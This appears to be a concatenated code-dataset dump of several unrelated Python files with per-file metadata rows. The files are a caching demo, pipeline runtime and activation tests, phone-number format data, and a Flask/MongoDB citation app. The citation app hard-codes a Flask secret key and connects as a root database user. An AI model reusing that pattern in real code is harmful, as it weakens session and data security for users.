# First six calls: three cache hits on (1, 1), then three distinct misses.
# Note (1, 2) and (2, 1) are separate cache entries — lru_cache keys on the
# exact argument tuple.
for _args in [(1, 1), (1, 1), (1, 1), (1, 2), (2, 1), (2, 2)]:
    _time_call(*_args)

print(slowadd.cache_info())

# (2, 3) evicts the least-recently-used entry; (1, 1) was evicted earlier,
# so it is slow again.
_time_call(2, 3)
_time_call(1, 1)
@lru_cache(maxsize=4)
def one():
    """Return 1, slowly; with no arguments the cache holds a single entry,
    so only the first call pays the one-second sleep."""
    time.sleep(1)
    return 1
# Demonstrate caching of a zero-argument function: only the first of the
# three identical calls below is slow. (Loop replaces three copy-pasted
# stanzas; printed output is unchanged.)
for _ in range(3):
    start_time = time.time()
    print("one() = %d" % one())
    print("--- %s seconds ---\n" % (time.time() - start_time))
| 24.632353
| 74
| 0.583881
| 259
| 1,675
| 3.675676
| 0.177606
| 0.277311
| 0.259454
| 0.196429
| 0.736345
| 0.736345
| 0.668067
| 0.668067
| 0.668067
| 0.633403
| 0
| 0.027679
| 0.158806
| 1,675
| 67
| 75
| 25
| 0.647977
| 0.082985
| 0
| 0.75
| 0
| 0
| 0.216678
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.136364
| 0.522727
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
365f979f0e83f8f44b84623a56a6fc3d1317c5c5
| 5,075
|
py
|
Python
|
test/test_runtime.py
|
TorkamaniLab/metapipe
|
15592e5b0c217afb00ac03503f8d0d7453d4baf4
|
[
"MIT"
] | 11
|
2016-01-26T06:47:05.000Z
|
2022-02-23T19:12:00.000Z
|
test/test_runtime.py
|
TorkamaniLab/metapipe
|
15592e5b0c217afb00ac03503f8d0d7453d4baf4
|
[
"MIT"
] | 44
|
2016-01-08T00:46:47.000Z
|
2016-04-13T00:46:47.000Z
|
test/test_runtime.py
|
TorkamaniLab/metapipe
|
15592e5b0c217afb00ac03503f8d0d7453d4baf4
|
[
"MIT"
] | 4
|
2015-10-30T19:24:13.000Z
|
2020-01-25T02:56:53.000Z
|
""" Tests for the runtime using a mock job. """
from __future__ import print_function
import sure
from metapipe.parser import Parser
from metapipe.runtime import Runtime
from metapipe.models import *
from .mocks import MockJob
from .fixtures import *
# Maps job-type names (as passed to Runtime) to the job classes that
# execute them; 'mock' is used by most tests below to avoid real execution.
JOB_TYPES = {
    'mock': MockJob,
    'local': LocalJob,
}
# New Command Tests


def _assert_initial_queue_length(count):
    """Build a Runtime from the first *count* parsed commands and assert its
    initial job queue contains exactly *count* entries."""
    parser = Parser(overall)
    cmds = parser.consume()[:count]
    pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock')
    pipeline.queue.queue.should.have.length_of(count)


def test_get_new_commands_1():
    _assert_initial_queue_length(1)


def test_get_new_commands_2():
    _assert_initial_queue_length(2)


def test_get_new_commands_3():
    _assert_initial_queue_length(3)


def test_get_new_commands_4():
    _assert_initial_queue_length(4)


def test_get_new_commands_5():
    _assert_initial_queue_length(5)


def test_get_new_commands_6():
    _assert_initial_queue_length(6)


def test_get_new_commands_7():
    _assert_initial_queue_length(7)


def test_get_new_commands_8():
    _assert_initial_queue_length(8)


def test_get_new_commands_9():
    _assert_initial_queue_length(9)
# Run Tests


def _run_first(count):
    """Build a Runtime from the first *count* parsed commands, run it to
    completion, and return the number of iterations the run took."""
    parser = Parser(overall)
    cmds = parser.consume()[:count]
    pipeline = Runtime(cmds, ReportingJobQueue, JOB_TYPES, 'mock',
                       sleep_time=0.01)
    return pipeline.run()


def test_run_1():
    _run_first(1).should.equal(8)


def test_run_2():
    _run_first(2).should.equal(15)


def test_run_3():
    _run_first(3).should.equal(23)


def test_run_4():
    _run_first(4).should.equal(23)


def test_run_5():
    _run_first(5).should.equal(23)


def test_run_6():
    _run_first(6).should.equal(23)


def test_run_7():
    _run_first(7).should.equal(24)


def test_run_8():
    _run_first(8).should.equal(24)


def test_run_9():
    _run_first(9).should.equal(25)


def test_run_10():
    _run_first(10).should.equal(25)


def test_run_11():
    # With all commands included the exact count varies; only a lower bound
    # is asserted (as in the original test).
    _run_first(11).should.be.greater_than(15)
def test_max_concurrent_jobs():
parser = Parser(concurrent)
cmds = parser.consume()
pipeline = Runtime(cmds, ReportingJobQueue, { 'local': MockJob }, 'local', sleep_time=0.01)
iters = pipeline.run()
iters.should.be.greater_than(30)
| 23.714953
| 95
| 0.680591
| 669
| 5,075
| 4.998505
| 0.101644
| 0.050239
| 0.075359
| 0.226077
| 0.874103
| 0.817584
| 0.796053
| 0.796053
| 0.796053
| 0.796053
| 0
| 0.027119
| 0.186207
| 5,075
| 213
| 96
| 23.826291
| 0.782567
| 0.013596
| 0
| 0.635037
| 0
| 0
| 0.019808
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153285
| false
| 0
| 0.051095
| 0
| 0.20438
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
367900d28fef54f80589236fe00ac1e9552b73c6
| 500
|
py
|
Python
|
tech_project/lib/python2.7/site-packages/phonenumbers/data/alt_format_595.py
|
priyamshah112/Project-Descripton-Blog
|
8e01016c6be79776c4f5ca75563fa3daa839e39e
|
[
"MIT"
] | 7
|
2019-05-20T09:57:02.000Z
|
2020-01-10T05:30:48.000Z
|
python/phonenumbers/data/alt_format_595.py
|
carljm/python-phonenumbers
|
494044aaf75443dbfd62b8d1352b441af6a458ae
|
[
"Apache-2.0"
] | 5
|
2020-03-24T16:37:25.000Z
|
2021-06-10T21:24:54.000Z
|
python/phonenumbers/data/alt_format_595.py
|
carljm/python-phonenumbers
|
494044aaf75443dbfd62b8d1352b441af6a458ae
|
[
"Apache-2.0"
] | 1
|
2019-04-20T05:26:27.000Z
|
2019-04-20T05:26:27.000Z
|
"""Auto-generated file, do not edit by hand. 595 metadata"""
from ..phonemetadata import NumberFormat
# Alternate number-format patterns for country calling code 595, keyed by
# digit-group shapes and leading-digit patterns.  This is generated data
# (see the module docstring): regenerate from the metadata source instead
# of editing the literal by hand.
PHONE_ALT_FORMAT_595 = [NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['(?:[26]1|3[289]|4[124678]|7[123]|8[1236])']), NumberFormat(pattern='(\\d{2})(\\d{6,7})', format='\\1 \\2', leading_digits_pattern=['(?:[26]1|3[289]|4[124678]|7[123]|8[1236])']), NumberFormat(pattern='(\\d{3})(\\d{6})', format='\\1 \\2', leading_digits_pattern=['[2-8][1-9]'])]
| 100
| 396
| 0.622
| 82
| 500
| 3.682927
| 0.414634
| 0.188742
| 0.198676
| 0.139073
| 0.615894
| 0.536424
| 0.417219
| 0.417219
| 0.417219
| 0.417219
| 0
| 0.150743
| 0.058
| 500
| 4
| 397
| 125
| 0.490446
| 0.108
| 0
| 0
| 1
| 1
| 0.397727
| 0.240909
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
369dadc15efedfccd0c68a0a192cbea70b90d47f
| 6,867
|
py
|
Python
|
models.py
|
sushaanpatel/citation-site
|
5e1707ced9246350c05eeb5d9badb1089f6f6647
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
sushaanpatel/citation-site
|
5e1707ced9246350c05eeb5d9badb1089f6f6647
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
sushaanpatel/citation-site
|
5e1707ced9246350c05eeb5d9badb1089f6f6647
|
[
"Apache-2.0"
] | null | null | null |
import os
import dotenv
from bson.objectid import ObjectId
from flask import Flask, render_template, request, redirect, url_for, session
# NOTE(review): this import re-binds ObjectId, shadowing the bson import
# above — confirm which ObjectId the rest of the module expects.
from flask_pymongo import PyMongo, ObjectId
from scraper import scrape

# Load the database password from a .env file / environment variable.
dotenv.load_dotenv()
password = os.environ.get('PASS')
app = Flask(__name__)
# Connection string embeds the root user and env-provided password.
app.config["MONGO_URI"] = f'mongodb+srv://root:{password}@memes.2xsyj.mongodb.net/citation?retryWrites=true&w=majority'
# NOTE(review): SECRET_KEY is hard-coded (and the f-prefix is redundant);
# this signs Flask sessions and should come from the environment instead.
app.config["SECRET_KEY"] = f'secretkeysecretkey'
mongo = PyMongo(app)
class Citation:
    """Base record for one citation entry.

    Holds the raw user-supplied fields; subclasses (Website, Image) are
    responsible for turning them into formatted citation text.
    """

    def __init__(self, author, publisher, ac_date, year, url, username, web_title, folder):
        # Store every field verbatim — no validation or normalisation here.
        self.author = author
        self.publisher = publisher
        self.url = url
        self.year = year
        self.ac_date = ac_date
        self.username = username
        self.web_title = web_title
        self.folder = folder
class Website(Citation):
    """Citation for a web page.

    The target page is scraped at cite time for its title and icon; the
    remaining fields come from the base Citation record.  Logged-in users
    get a MongoDB document, anonymous users ('ano') accumulate citations
    in the Flask session.
    """

    def citeit(self):
        """Build the citation text and persist it (DB or session)."""
        # NOTE(review): only the first two space-separated author tokens are
        # used; extra name parts are silently dropped — confirm intended.
        a = self.author.split(' ')
        web = scrape(self.url)
        title = web['title']
        icon = web['icon']
        fname = None
        lname = None
        text = None
        # Keep only the text before the first '-' of the year field
        # (presumably an ISO 'YYYY-MM-DD' date — TODO confirm with callers).
        year = self.year.split('-')[0]
        if (len(a) == 1):
            lname = a[0]
            text = (f"""{lname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        else:
            fname = a[0]
            lname = a[1]
            text = (f"""{lname}, {fname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        # An empty author overrides both branches above with an author-less form.
        if (self.author == ""):
            text = (f""""{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        if self.username != 'ano':
            # Authenticated user: persist to MongoDB (tags only stored here).
            mongo.db.cites.insert_one({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web', 'tags': self.folder})
        else:
            # Anonymous user: append to (or create) the session citation list.
            if 'citation' in session:
                clist = list(session['citation'])
                clist.append({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web'})
                session['citation'] = clist
            else:
                session['citation'] = [{'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web'}]

    def update(self, cid):
        """Rebuild the citation text and overwrite document *cid* in MongoDB.

        NOTE(review): the text-building logic below duplicates citeit();
        a shared helper would remove the drift risk.
        """
        a = self.author.split(' ')
        web = scrape(self.url)
        title = web['title']
        icon = web['icon']
        fname = None
        lname = None
        text = None
        year = self.year.split('-')[0]
        if (len(a) == 1):
            lname = a[0]
            text = (f"""{lname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        else:
            fname = a[0]
            lname = a[1]
            text = (f"""{lname}, {fname}. "{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        if (self.author == ""):
            text = (f""""{title}" {self.publisher if self.publisher != "" else "Np"}., {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        mongo.db.cites.update_one({'_id': ObjectId(cid)},{"$set": {'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'web', 'tags': self.folder}})
"""Wikipedia. Taking Photo. 2022. Web. 7 Feb. 2022 . <https://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Image_created_with_a_mobile_phone.png/330px-Image_created_with_a_mobile_phone.png>."""
class Image(Citation):
    """Citation for an image.

    Unlike Website, nothing is scraped: the stored web_title is used as the
    title and the image URL doubles as the icon.  The formatted text also
    omits the publisher.
    """

    def citeit(self):
        """Build the citation text and persist it (DB or session)."""
        # NOTE(review): only the first two space-separated author tokens are
        # used; extra name parts are silently dropped — confirm intended.
        a = self.author.split(' ')
        title = self.web_title
        icon = self.url
        fname = None
        lname = None
        text = None
        # Keep only the text before the first '-' of the year field
        # (presumably an ISO 'YYYY-MM-DD' date — TODO confirm with callers).
        year = self.year.split('-')[0]
        if (len(a) == 1):
            lname = a[0]
            text = (f"""{lname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        else:
            fname = a[0]
            lname = a[1]
            text = (f"""{lname}, {fname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        # An empty author overrides both branches above with an author-less form.
        if (self.author == ""):
            text = (f"""{title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        if self.username != 'ano':
            # Authenticated user: persist to MongoDB (tags only stored here).
            mongo.db.cites.insert_one({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img', 'tags': self.folder})
        else:
            # Anonymous user: append to (or create) the session citation list.
            if 'citation' in session:
                clist = list(session['citation'])
                clist.append({'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img'})
                session['citation'] = clist
            else:
                session['citation'] = [{'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img'}]

    def update(self, cid):
        """Rebuild the citation text and overwrite document *cid* in MongoDB.

        NOTE(review): the text-building logic below duplicates citeit();
        a shared helper would remove the drift risk.
        """
        a = self.author.split(' ')
        title = self.web_title
        icon = self.url
        fname = None
        lname = None
        text = None
        year = self.year.split('-')[0]
        if (len(a) == 1):
            lname = a[0]
            text = (f"""{lname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        else:
            fname = a[0]
            lname = a[1]
            text = (f"""{lname}, {fname}. {title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        if (self.author == ""):
            text = (f"""{title}. {year + ". " if year != "" else ""}Web. {self.ac_date}. <{self.url}>.""")
        mongo.db.cites.update_one({'_id': ObjectId(cid)},{"$set": {'user': self.username, 'author': self.author, 'web_title': title, 'ac_date': self.ac_date, 'pub_year': self.year, 'publisher': self.publisher, 'url': self.url, 'full_citation': text, 'icon': icon, 'type': 'img', 'tags': self.folder}})
| 55.829268
| 301
| 0.548274
| 865
| 6,867
| 4.248555
| 0.127168
| 0.050612
| 0.057143
| 0.045714
| 0.81415
| 0.81415
| 0.81415
| 0.797279
| 0.777143
| 0.777143
| 0
| 0.006571
| 0.246541
| 6,867
| 123
| 302
| 55.829268
| 0.703711
| 0
| 0
| 0.719298
| 0
| 0.114035
| 0.327586
| 0.013493
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04386
| false
| 0.017544
| 0.052632
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36a45f70c50fa4ca2fd72432c9ce4b4b423a903c
| 35,674
|
py
|
Python
|
capsul/pipeline/test/test_complex_pipeline_activations.py
|
servoz/capsul
|
2d72228c096f1c43ecfca7f3651b353dc35e209e
|
[
"CECILL-B"
] | null | null | null |
capsul/pipeline/test/test_complex_pipeline_activations.py
|
servoz/capsul
|
2d72228c096f1c43ecfca7f3651b353dc35e209e
|
[
"CECILL-B"
] | null | null | null |
capsul/pipeline/test/test_complex_pipeline_activations.py
|
servoz/capsul
|
2d72228c096f1c43ecfca7f3651b353dc35e209e
|
[
"CECILL-B"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import os
import shutil
import unittest
import tempfile
import sys
import six
from traits.api import File
from capsul.api import Process, Pipeline, Switch, get_process_instance
class Identity(Process):
    """Minimal pass-through process used as a graph node in the tests.

    Declares one mandatory input file and one mandatory output file; no
    execution logic is defined here.
    """
    input_image = File(optional=False, output=False)
    output_image = File(optional=False, output=True)
class ComplexPipeline(Pipeline):
    """Pipeline to test complex constructions behaviours

    Feeds one 'first_pipeline' into three parallel copies of the same test
    pipeline (pipeline_1/_10/_100), routes their outputs through a
    'select_threshold' switch, and exposes the selected results through
    three Identity nodes.
    """
    def pipeline_definition(self):
        """Build the node graph, links, exported parameters and GUI layout."""
        # Create processes
        self.add_process('first_pipeline',
                         'capsul.process.test.test_pipeline')
        # The three parallel pipelines have their outputs made optional so
        # the switch can deactivate the unselected ones.
        self.add_process('pipeline_1',
                         'capsul.process.test.test_pipeline',
                         make_optional=['output_1', 'output_10','output_100'])
        #self.export_parameter('pipeline_1', 'output_1')
        self.add_process('pipeline_10',
                         'capsul.process.test.test_pipeline',
                         make_optional=['output_1', 'output_10','output_100'])
        self.add_process('pipeline_100',
                         'capsul.process.test.test_pipeline',
                         make_optional=['output_1', 'output_10','output_100'])
        # Switch with three selectable inputs and three outputs (a/b/c).
        self.add_switch('select_threshold', ['threshold_1', 'threshold_10', 'threshold_100'], ['output_a', 'output_b', 'output_c'])
        self.add_process('identity_a', Identity)
        self.add_process('identity_b', Identity)
        self.add_process('identity_c', Identity)
        # One exported 'select_method' drives all four sub-pipelines.
        self.export_parameter('first_pipeline', 'select_method')
        self.add_link('select_method->pipeline_1.select_method')
        self.add_link('select_method->pipeline_10.select_method')
        self.add_link('select_method->pipeline_100.select_method')
        # Fan the first pipeline's three outputs into the parallel copies.
        self.add_link('first_pipeline.output_1->pipeline_1.input_image')
        self.add_link('first_pipeline.output_10->pipeline_10.input_image')
        self.add_link('first_pipeline.output_100->pipeline_100.input_image')
        # Wire every (pipeline, output) pair to the matching switch input.
        self.add_link('pipeline_1.output_1->select_threshold.threshold_1_switch_output_a')
        self.add_link('pipeline_1.output_10->select_threshold.threshold_10_switch_output_a')
        self.add_link('pipeline_1.output_100->select_threshold.threshold_100_switch_output_a')
        self.add_link('pipeline_10.output_1->select_threshold.threshold_1_switch_output_b')
        self.add_link('pipeline_10.output_10->select_threshold.threshold_10_switch_output_b')
        self.add_link('pipeline_10.output_100->select_threshold.threshold_100_switch_output_b')
        self.add_link('pipeline_100.output_1->select_threshold.threshold_1_switch_output_c')
        self.add_link('pipeline_100.output_10->select_threshold.threshold_10_switch_output_c')
        self.add_link('pipeline_100.output_100->select_threshold.threshold_100_switch_output_c')
        # Switch outputs terminate in identity nodes whose outputs are exported.
        self.add_link('select_threshold.output_a->identity_a.input_image')
        self.add_link('select_threshold.output_b->identity_b.input_image')
        self.add_link('select_threshold.output_c->identity_c.input_image')
        self.export_parameter('identity_a', 'output_image', 'output_a')
        self.export_parameter('identity_b', 'output_image', 'output_b')
        self.export_parameter('identity_c', 'output_image', 'output_c')
        # Fixed node coordinates for the GUI pipeline view.
        self.node_position = {'first_pipeline': (118.0, 486.0),
                              'identity_a': (870.0, 644.0),
                              'identity_b': (867.0, 742.0),
                              'identity_c': (866.0, 846.0),
                              'inputs': (-107.0, 491.0),
                              'outputs': (1111.0, 723.0),
                              'pipeline_1': (329.0, 334.0),
                              'pipeline_10': (331.0, 533.0),
                              'pipeline_100': (334.0, 738.0),
                              'select_threshold': (559.0, 453.0)}
class TestComplexPipeline(unittest.TestCase):
expected_status = [
({},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
({'select_method': 'lower than'},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_lt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_lt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_lt_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_100.mask_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.mask_10': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.mask_100': {
'_activated': False,
'_enabled': True,
},
'select_threshold': {
'_activated': True,
'_enabled': True,
},
'identity_a': {
'_activated': True,
'_enabled': True,
},
'identity_b': {
'_activated': True,
'_enabled': True,
},
'identity_c': {
'_activated': True,
'_enabled': True,
},
}
),
({'select_threshold': 'threshold_10'},
{
'': {
'_activated': True,
'_enabled': True,
},
'first_pipeline': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_gt_100': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'first_pipeline.mask_1': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_10': {
'_activated': True,
'_enabled': True,
},
'first_pipeline.mask_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_1': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_1.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_1.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_1.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_10': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.threshold_lt_100': {
'_activated': False,
'_enabled': False,
},
'pipeline_10.mask_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_10.mask_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_10.mask_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_1': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_gt_10': {
'_activated': True,
'_enabled': True,
},
'pipeline_100.threshold_gt_100': {
'_activated': False,
'_enabled': True,
},
'pipeline_100.threshold_lt_1': {
'_activated': False,
'_enabled': False,
},
